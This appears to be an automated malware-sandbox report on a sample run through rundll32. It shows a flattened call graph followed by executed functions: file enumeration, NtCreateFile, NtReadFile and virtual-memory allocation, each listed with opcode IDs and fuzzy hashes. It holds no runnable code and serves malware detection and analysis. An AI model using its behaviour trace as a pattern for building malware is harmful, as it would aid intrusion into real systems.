f3a4a0 LdrLoadDll 34752->34753 34755 f427f9 34753->34755 34759 f3a4a0 LdrLoadDll 34755->34759 34761 f42817 34755->34761 34758 f42866 34757->34758 34971 f488a0 34757->34971 34758->34558 34759->34761 34760 f42900 34760->34558 34763 f3a4a0 LdrLoadDll 34761->34763 34762 f428ab 34762->34760 34765 f4290c 34762->34765 34766 f428ca 34762->34766 34764 f4283b 34763->34764 34768 f456b0 8 API calls 34764->34768 34767 f3a4a0 LdrLoadDll 34765->34767 34769 f428d2 34766->34769 34770 f428ef 34766->34770 34771 f4291d 34767->34771 34768->34757 34772 f4bef0 2 API calls 34769->34772 34773 f4bef0 2 API calls 34770->34773 34997 f41be0 34771->34997 34774 f428e3 34772->34774 34773->34760 34774->34558 34776 f42a1f 34777 f4bef0 2 API calls 34776->34777 34778 f42a26 34777->34778 34778->34558 34779 f42937 34779->34776 35003 f422d0 9 API calls 34779->35003 34782 f427b0 11 API calls 34781->34782 34783 f3d3ab 34782->34783 34784 f417a0 34783->34784 34785 f417c2 34784->34785 34786 f3a4a0 LdrLoadDll 34785->34786 34787 f4198d 34786->34787 34788 f3a4a0 LdrLoadDll 34787->34788 34789 f4199e 34788->34789 34790 f3a370 LdrLoadDll 34789->34790 34791 f419b5 34790->34791 35005 f41670 34791->35005 34794 f41670 11 API calls 34795 f41a2b 34794->34795 34796 f41670 11 API calls 34795->34796 34797 f41a43 34796->34797 34798 f41670 11 API calls 34797->34798 34799 f41a5b 34798->34799 34800 f41670 11 API calls 34799->34800 34801 f41a73 34800->34801 34802 f41670 11 API calls 34801->34802 34803 f41a8e 34802->34803 34804 f41aa8 34803->34804 34805 f41670 11 API calls 34803->34805 34804->34562 34806 f41adc 34805->34806 34807 f41670 11 API calls 34806->34807 34808 f41b19 34807->34808 34809 f41670 11 API calls 34808->34809 34810 f41b56 34809->34810 34811 f41670 11 API calls 34810->34811 34812 f41b93 34811->34812 34813 f41670 11 API calls 34812->34813 34814 f41bd0 34813->34814 34814->34562 34816 f44059 34815->34816 34817 f3a150 LdrLoadDll 34816->34817 34818 f44088 34817->34818 34819 f45ab0 LdrLoadDll 34818->34819 34838 f44256 34818->34838 34820 f440b2 34819->34820 34821 f45ab0 LdrLoadDll 34820->34821 34822 f440c5 34821->34822 34823 f45ab0 LdrLoadDll 34822->34823 34824 f440d8 34823->34824 34825 f45ab0 LdrLoadDll 34824->34825 34826 f440eb 34825->34826 34827 f45ab0 LdrLoadDll 34826->34827 34828 f44101 34827->34828 34829 f45ab0 LdrLoadDll 34828->34829 34830 f44114 34829->34830 34831 f45ab0 LdrLoadDll 34830->34831 34832 f44127 34831->34832 34833 f45ab0 LdrLoadDll 34832->34833 34834 f4413a 34833->34834 34835 f45ab0 LdrLoadDll 34834->34835 34836 f4414f 34835->34836 34837 f44330 8 API calls 34836->34837 34836->34838 34840 f441d1 34837->34840 34838->34564 34840->34838 35020 f43c10 LdrLoadDll 34840->35020 34842 f3f130 34841->34842 34845 f3f13b 34841->34845 34843 f4c0c0 2 API calls 34842->34843 34843->34845 35021 f3dc30 34845->35021 34846 f3f151 34846->34566 34848 f3f14a 34848->34846 34849 f3f170 34848->34849 35030 f3ecc0 34848->35030 34850 f3f188 34849->34850 34851 f4bef0 2 API calls 34849->34851 34850->34566 34851->34850 34853 f3f353 34852->34853 35049 f41d10 34853->35049 34855 f3f3b4 34858 f43a00 8 API calls 34855->34858 34856 f3f376 34856->34855 35058 f3f1a0 34856->35058 34859 f3f3d7 34858->34859 34860 f3f1a0 8 API calls 34859->34860 34861 f3f415 34859->34861 34860->34861 34862 f3f1a0 8 API calls 34861->34862 34863 f3d3e1 34862->34863 34863->34332 34865 f443ad 34864->34865 34866 f456b0 8 API calls 34865->34866 34867 f44529 34865->34867 34866->34867 34867->34666 34868->34671 34869->34674 34870->34680 34871->34686 34873 f434fc 34872->34873 34874 f3a150 LdrLoadDll 34873->34874 34875 f43517 34874->34875 34876 f43520 34875->34876 34877 f45ab0 LdrLoadDll 34875->34877 34876->34708 34878 f43537 34877->34878 34879 f45ab0 LdrLoadDll 34878->34879 34880 f4354c 34879->34880 34881 f45ab0 LdrLoadDll 34880->34881 34882 f4355f 34881->34882 34883 f45ab0 LdrLoadDll 34882->34883 34884 f43572 34883->34884 34885 f45ab0 LdrLoadDll 34884->34885 34886 f43588 34885->34886 34887 f45ab0 LdrLoadDll 34886->34887 34888 f4359b 34887->34888 34889 f3a150 LdrLoadDll 34888->34889 34891 f435c4 34889->34891 34890 f43660 34890->34708 34891->34890 34892 f45ab0 LdrLoadDll 34891->34892 34893 f435e8 34892->34893 34894 f3a150 LdrLoadDll 34893->34894 34895 f4361d 34894->34895 34895->34890 34896 f45ab0 LdrLoadDll 34895->34896 34897 f4363a 34896->34897 34898 f45ab0 LdrLoadDll 34897->34898 34899 f4364d 34898->34899 34900 f45ab0 LdrLoadDll 34899->34900 34900->34890 34902 f43435 34901->34902 34902->34717 34904 f4af70 LdrLoadDll 34903->34904 34905 f4a17c 34904->34905 34909 51e9610 LdrInitializeThunk 34905->34909 34906 f4a19b 34906->34724 34908->34724 34909->34906 34911 f40638 34910->34911 34912 f3a4a0 LdrLoadDll 34911->34912 34913 f406d6 34912->34913 34914 f3a4a0 LdrLoadDll 34913->34914 34915 f406f1 34914->34915 34916 f3ba10 2 API calls 34915->34916 34917 f40716 34916->34917 34918 f4088e 34917->34918 34919 f4a0e0 2 API calls 34917->34919 34920 f4089f 34918->34920 34951 f3f6d0 34918->34951 34922 f40741 34919->34922 34920->34732 34923 f40884 34922->34923 34924 f4074c 34922->34924 34925 f4a450 2 API calls 34923->34925 34926 f4a450 2 API calls 34924->34926 34925->34918 34927 f4078f 34926->34927 34963 f4c190 LdrLoadDll 34927->34963 34929 f407c8 34930 f407cf 34929->34930 34931 f3ba10 2 API calls 34929->34931 34930->34732 34932 f407f3 34931->34932 34932->34920 34933 f4a0e0 2 API calls 34932->34933 34934 f40818 34933->34934 34935 f4081f 34934->34935 34936 f4086b 34934->34936 34938 f4a450 2 API calls 34935->34938 34937 f4a450 2 API calls 34936->34937 34940 f40875 34937->34940 34939 f40829 34938->34939 34964 f3fd10 LdrLoadDll 34939->34964 34940->34732 34942 f40846 34942->34920 34965 f40320 8 API calls 34942->34965 34944 f4085c 34944->34732 34945->34735 34946->34733 34947->34738 34948->34745 34949->34741 34950->34743 34952 f3f6f5 34951->34952 34953 f3a4a0 LdrLoadDll 34952->34953 34954 f3f7b0 34953->34954 34955 f3a4a0 LdrLoadDll 34954->34955 34956 f3f7d4 34955->34956 34957 f456b0 8 API calls 34956->34957 34959 f3f827 34957->34959 34958 f3f8e1 34958->34920 34959->34958 34960 f3a4a0 LdrLoadDll 34959->34960 34961 f3f88e 34960->34961 34962 f456b0 8 API calls 34961->34962 34962->34958 34963->34929 34964->34942 34965->34944 34967 f43a1c 34966->34967 34968 f3a4a0 LdrLoadDll 34966->34968 34969 f43ad5 34967->34969 34970 f456b0 8 API calls 34967->34970 34968->34967 34969->34757 34970->34969 34972 f488ae 34971->34972 34973 f488b5 34971->34973 34972->34762 34974 f3a150 LdrLoadDll 34973->34974 34975 f488e0 34974->34975 34976 f4c0c0 2 API calls 34975->34976 34995 f48a34 34975->34995 34977 f488f8 34976->34977 34977->34995 35004 f41d80 LdrLoadDll 34977->35004 34979 f48916 34980 f45ab0 LdrLoadDll 34979->34980 34981 f4892c 34980->34981 34982 f45ab0 LdrLoadDll 34981->34982 34983 f48948 34982->34983 34984 f45ab0 LdrLoadDll 34983->34984 34985 f48964 34984->34985 34986 f45ab0 LdrLoadDll 34985->34986 34987 f48983 34986->34987 34988 f45ab0 LdrLoadDll 34987->34988 34989 f4899f 34988->34989 34990 f45ab0 LdrLoadDll 34989->34990 34991 f489bb 34990->34991 34992 f45ab0 LdrLoadDll 34991->34992 34993 f489e1 34992->34993 34994 f4bef0 2 API calls 34993->34994 34996 f48a24 34993->34996 34994->34995 34995->34762 34996->34762 34998 f41c06 34997->34998 34999 f3a4a0 LdrLoadDll 34998->34999 35000 f41c3c 34999->35000 35001 f3bd40 10 API calls 35000->35001 35002 f41cff 35001->35002 35002->34779 35003->34779 35004->34979 35006 f41699 35005->35006 35007 f45ab0 LdrLoadDll 35006->35007 35008 f416d0 35007->35008 35009 f45ab0 LdrLoadDll 35008->35009 35010 f416e8 35009->35010 35011 f45ab0 LdrLoadDll 35010->35011 35013 f41704 35011->35013 35012 f4178c 35012->34794 35013->35012 35014 f4172e FindFirstFileW 35013->35014 35014->35012 35018 f41749 35014->35018 35015 f41773 FindNextFileW 35016 f41785 FindClose 35015->35016 35015->35018 35016->35012 35018->35015 35019 f41550 11 API calls 35018->35019 35019->35018 35020->34840 35022 f3dc50 35021->35022 35023 f3dc48 35021->35023 35024 f488a0 3 API calls 35022->35024 35023->34848 35025 f3dc63 35024->35025 35025->35023 35026 f3a4a0 LdrLoadDll 35025->35026 35027 f3dced 35026->35027 35028 f3a4a0 LdrLoadDll 35027->35028 35029 f3dcfe 35028->35029 35029->34848 35031 f3ece7 35030->35031 35032 f45ab0 LdrLoadDll 35031->35032 35033 f3ee60 35032->35033 35034 f3ee6b GetFileAttributesW 35033->35034 35035 f3f119 35033->35035 35034->35035 35036 f3ee7d 35034->35036 35035->34848 35036->35035 35037 f456b0 8 API calls 35036->35037 35040 f3eef2 35037->35040 35038 f3a4a0 LdrLoadDll 35039 f3ef9d 35038->35039 35041 f41be0 10 API calls 35039->35041 35042 f456b0 8 API calls 35040->35042 35045 f3ef7b 35040->35045 35046 f3efcd 35041->35046 35043 f3ef33 35042->35043 35044 f456b0 8 API calls 35043->35044 35043->35045 35044->35045 35045->35035 35045->35038 35046->35035 35048 f422d0 9 API calls 35046->35048 35048->35046 35050 f3a4a0 LdrLoadDll 35049->35050 35051 f41d26 35050->35051 35052 f3a4a0 LdrLoadDll 35051->35052 35053 f41d3a 35051->35053 35052->35053 35054 f3a4a0 LdrLoadDll 35053->35054 35055 f41d54 35054->35055 35056 f41d68 35055->35056 35057 f456b0 8 API calls 35055->35057 35056->34856 35057->35056 35059 f3f1d0 35058->35059 35060 f3f2e5 35058->35060 35061 f456b0 8 API calls 35059->35061 35060->34855 35062 f3f1e8 35061->35062 35062->35060 35063 f456b0 8 API calls 35062->35063 35064 f3f218 35063->35064 35064->35060 35065 f4bef0 2 API calls 35064->35065 35065->35060 35066->34574 35068 f3bbac 35067->35068 35069 f3ba10 2 API calls 35068->35069 35070 f3bbf6 35069->35070 35071 f3bc98 35070->35071 35072 f4a160 2 API calls 35070->35072 35071->34584 35075 f3bc1d 35072->35075 35073 f3bc8f 35074 f4a450 2 API calls 35073->35074 35074->35071 35075->35073 35076 f3bca4 35075->35076 35077 f4a160 2 API calls 35075->35077 35078 f4a450 2 API calls 35076->35078 35077->35075 35079 f3bcad 35078->35079 35080 f3bd1c 35079->35080 35081 f3ba10 2 API calls 35079->35081 35080->34584 35082 f3bcc6 35081->35082 35082->35080 35083 f45ab0 LdrLoadDll 35082->35083 35083->35080 35084 51e9540 LdrInitializeThunk

                                                                                                            Executed Functions

                                                                                                            Function 00F4166B Relevance: 4.6, APIs: 3, Instructions: 102fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(?,00000000), ref: 00F4173F
                                                                                                            • FindNextFileW.KERNELBASE(?,00000010), ref: 00F4177E
                                                                                                            • FindClose.KERNEL32(?), ref: 00F41789
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Find$File$CloseFirstNext
                                                                                                            • String ID:
                                                                                                            • API String ID: 3541575487-0
                                                                                                            • Opcode ID: 63a4d5704ae68a6ee1ba8cb65f15542c9b7cd2edd9d749d76b4829906cc71f08
                                                                                                            • Instruction ID: 75becb4fff0e2d75883aa61d8170b319780bae7d1fadc13862c8bf06c6cea6b2
                                                                                                            • Opcode Fuzzy Hash: 63a4d5704ae68a6ee1ba8cb65f15542c9b7cd2edd9d749d76b4829906cc71f08
                                                                                                            • Instruction Fuzzy Hash: 37318475900348ABDB20DF64CC85FEB7F78AF44714F14459DBE09A7181E7B4AA889BA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00F41670 Relevance: 4.6, APIs: 3, Instructions: 101fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(?,00000000), ref: 00F4173F
                                                                                                            • FindNextFileW.KERNELBASE(?,00000010), ref: 00F4177E
                                                                                                            • FindClose.KERNEL32(?), ref: 00F41789
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Find$File$CloseFirstNext
                                                                                                            • String ID:
                                                                                                            • API String ID: 3541575487-0
                                                                                                            • Opcode ID: 6030c7ac88ae28657aba97c811ac57c097871a54f8334a171ac8116b0444eca7
                                                                                                            • Instruction ID: 269bcb30a7871f5e0a69fe6d91add75f78bf026cf8c914462725906c03d8d24e
                                                                                                            • Opcode Fuzzy Hash: 6030c7ac88ae28657aba97c811ac57c097871a54f8334a171ac8116b0444eca7
                                                                                                            • Instruction Fuzzy Hash: 613165759003087BDB20DF64CC85FEB7F7CAF44714F144599BE09A7181EBB4AA889BA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00F4A2DA Relevance: 1.6, APIs: 1, Instructions: 80filenativeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • NtCreateFile.NTDLL(00000060,00000005,00000000,00F45817,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,00F45817,00000000,00000005,00000060,00000000,00000000), ref: 00F4A36D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: 13972dcf1e80a6060fbfba47f86d76c3df8f2844d29591f854aae2ea4d140ddf
                                                                                                            • Instruction ID: b663dafab5e7ba8f73b8bb80c9b85ea3c2045e42b5bc27c69ef89b432aad01fa
                                                                                                            • Opcode Fuzzy Hash: 13972dcf1e80a6060fbfba47f86d76c3df8f2844d29591f854aae2ea4d140ddf
                                                                                                            • Instruction Fuzzy Hash: 5E21F8B6204108ABDB14DF88DC85EEB3BADEF8C754F118559BE4D9B242C630E8118BA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00F4A320 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • NtCreateFile.NTDLL(00000060,00000005,00000000,00F45817,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,00F45817,00000000,00000005,00000060,00000000,00000000), ref: 00F4A36D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: 48d3632995a7b26b824f235392bcc6b0a4ea212460d230c7ade1e6732e9d5a4a
                                                                                                            • Instruction ID: 0123f79be553251be673026e5d7db2c0ab156e97fcd7e4e936cb4b0e3342ef67
                                                                                                            • Opcode Fuzzy Hash: 48d3632995a7b26b824f235392bcc6b0a4ea212460d230c7ade1e6732e9d5a4a
                                                                                                            • Instruction Fuzzy Hash: 9CF0BDB6200208AFCB08CF88DC85EEB37ADAF8C754F018208BA0997241C630F8518BA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00F4A3D0 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • NtReadFile.NTDLL(00F459D2,5D9515B3,FFFFFFFF,00F45691,00000206,?,00F459D2,00000206,00F45691,FFFFFFFF,5D9515B3,00F459D2,00000206,00000000), ref: 00F4A415
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 2738559852-0
                                                                                                            • Opcode ID: a61962a776c40c0761ec9b5d264e231ef2a343af67136adf04206c6c4bc3357e
                                                                                                            • Instruction ID: ab43be4044537cf8b5ca96123f5751cf317619c3ad945a72a2cf6416a06f44ea
                                                                                                            • Opcode Fuzzy Hash: a61962a776c40c0761ec9b5d264e231ef2a343af67136adf04206c6c4bc3357e
                                                                                                            • Instruction Fuzzy Hash: 21F0A4B6200208ABDB14DF99DC85EEB77ADAF8C754F118248BE0D97251D630E811CBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00F4A324 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • NtCreateFile.NTDLL(00000060,00000005,00000000,00F45817,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,00F45817,00000000,00000005,00000060,00000000,00000000), ref: 00F4A36D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: be869cfb6ee2f69ba5ebec51d914e6aac7644c7b8c32f31d34b7451a482147f3
                                                                                                            • Instruction ID: 6f3ab1602451068a576618d5deed794a4943217bee00a6dd536a33030c0d87e0
                                                                                                            • Opcode Fuzzy Hash: be869cfb6ee2f69ba5ebec51d914e6aac7644c7b8c32f31d34b7451a482147f3
                                                                                                            • Instruction Fuzzy Hash: BAF0F4B6204149AFCB08CF98DC84CEB77ADEF8C354B05824CFA1C93201D630E851CBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00F4A500 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00F32D11,00002000,00003000,00000004), ref: 00F4A539
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocateMemoryVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 2167126740-0
                                                                                                            • Opcode ID: 33bb83296b48386454dbb765a9fa584987a824901d4fa82aee9f69387c62dbb1
                                                                                                            • Instruction ID: 207c6e003242a25a89ee8f053c3e75265070a99b2c01940b883c5a0a084e1d96
                                                                                                            • Opcode Fuzzy Hash: 33bb83296b48386454dbb765a9fa584987a824901d4fa82aee9f69387c62dbb1
                                                                                                            • Instruction Fuzzy Hash: F9F015B6210208ABDB14DF89DC81EAB77ADAF8C754F018108BE0897241C630F810CBB0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00F4A44A Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • NtClose.NTDLL(00F459B0,00000206,?,00F459B0,00000005,FFFFFFFF), ref: 00F4A475
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Close
                                                                                                            • String ID:
                                                                                                            • API String ID: 3535843008-0
                                                                                                            • Opcode ID: 8c0329030e001bdeff8e749bfdc14507ffaf8417d4be3d2efb3fafa8f1c184cf
                                                                                                            • Instruction ID: c8220929c7ecf6ab557212fd33dbce7f1d8389efa69d8db495e09b4657350db1
                                                                                                            • Opcode Fuzzy Hash: 8c0329030e001bdeff8e749bfdc14507ffaf8417d4be3d2efb3fafa8f1c184cf
                                                                                                            • Instruction Fuzzy Hash: CBE0EC76640150ABE715EBA4DC89E977B69DF44660F058095BD489F642C530E500C7E1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00F4A450 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • NtClose.NTDLL(00F459B0,00000206,?,00F459B0,00000005,FFFFFFFF), ref: 00F4A475
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f30000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Close
                                                                                                            • String ID:
                                                                                                            • API String ID: 3535843008-0
                                                                                                            • Opcode ID: 881ea047b92b26aa447024a6cbf2ec0bd8a5bbf6b70a504f16765888542bc5d5
                                                                                                            • Instruction ID: 93a13d59b7dffef5143d98694e233bfec75bb20b720c402eab8acbe6e11d20cd
                                                                                                            • Opcode Fuzzy Hash: 881ea047b92b26aa447024a6cbf2ec0bd8a5bbf6b70a504f16765888542bc5d5
                                                                                                            • Instruction Fuzzy Hash: ADD01776240214ABE620EB98DC89E977BACDF48660F018055BE485B242C530FA0086E1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 051E9540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.775512023.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                            • Associated: 0000000F.00000002.775632132.000000000529B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 0000000F.00000002.775648086.000000000529F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_5180000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: caeef0ada81b0ab8b287b06589a00f1a1bbf5853f3b101cf3d53adb448dd8c43
                                                                                                            • Instruction ID: 1517cc40154bf8c30a44feff290a08fcdc8e4480b9baf7615f1debfc0d9db02c
                                                                                                            • Opcode Fuzzy Hash: caeef0ada81b0ab8b287b06589a00f1a1bbf5853f3b101cf3d53adb448dd8c43
                                                                                                            • Instruction Fuzzy Hash: 10900265211000030105A5591744517005697D5395392C425F2006550CD76588617261
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 051E95D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.775512023.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                            • Associated: 0000000F.00000002.775632132.000000000529B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 0000000F.00000002.775648086.000000000529F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_5180000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 775fbfd5286ab9b718c71b62df81b36b29eb3a012d230a48acecb690c82317d2
                                                                                                            • Instruction ID: dd7aeb9aedc05f2b010323ea5345902a75e88169fcee4474c962c62b9ede5718
                                                                                                            • Opcode Fuzzy Hash: 775fbfd5286ab9b718c71b62df81b36b29eb3a012d230a48acecb690c82317d2
                                                                                                            • Instruction Fuzzy Hash: 529002A120200003410571595554626401A97E0245B92C425E2005590DC66988917265
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 051E9710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.775512023.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                            • Associated: 0000000F.00000002.775632132.000000000529B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 0000000F.00000002.775648086.000000000529F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_5180000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: d341c0ce4a6099d0cf529f87182f158761a063f88f5f33223c201e19ea0857e4
                                                                                                            • Instruction ID: 1bef51ecc1570db8757f0432556d384fb92b14d33513c6bed5a0ec5241c5a7fa
                                                                                                            • Opcode Fuzzy Hash: d341c0ce4a6099d0cf529f87182f158761a063f88f5f33223c201e19ea0857e4
                                                                                                            • Instruction Fuzzy Hash: 6B90027120100402D10065996548656001597E0345F92D415A6015555EC7A988917271
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 051E9780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.775512023.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                            • Associated: 0000000F.00000002.775632132.000000000529B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 0000000F.00000002.775648086.000000000529F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_5180000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: ddbd6d258a26490ba1c37e5d3a28e063d28d7519d6d4996d782c0531bc9215e3
                                                                                                            • Instruction ID: 6c8f402c1aed513be7a007627bb4c94fff93980d2b465c60b620b89836cc9093
                                                                                                            • Opcode Fuzzy Hash: ddbd6d258a26490ba1c37e5d3a28e063d28d7519d6d4996d782c0531bc9215e3
                                                                                                            • Instruction Fuzzy Hash: 9B90026921300002D1807159654861A001597D1246FD2D819A1006558CCA5988697361
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 051E9FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.775512023.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                            • Associated: 0000000F.00000002.775632132.000000000529B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 0000000F.00000002.775648086.000000000529F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_5180000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 05cbb0cd702e39e7cc81e2b939af7f08163b393ed286858609a456b257855990
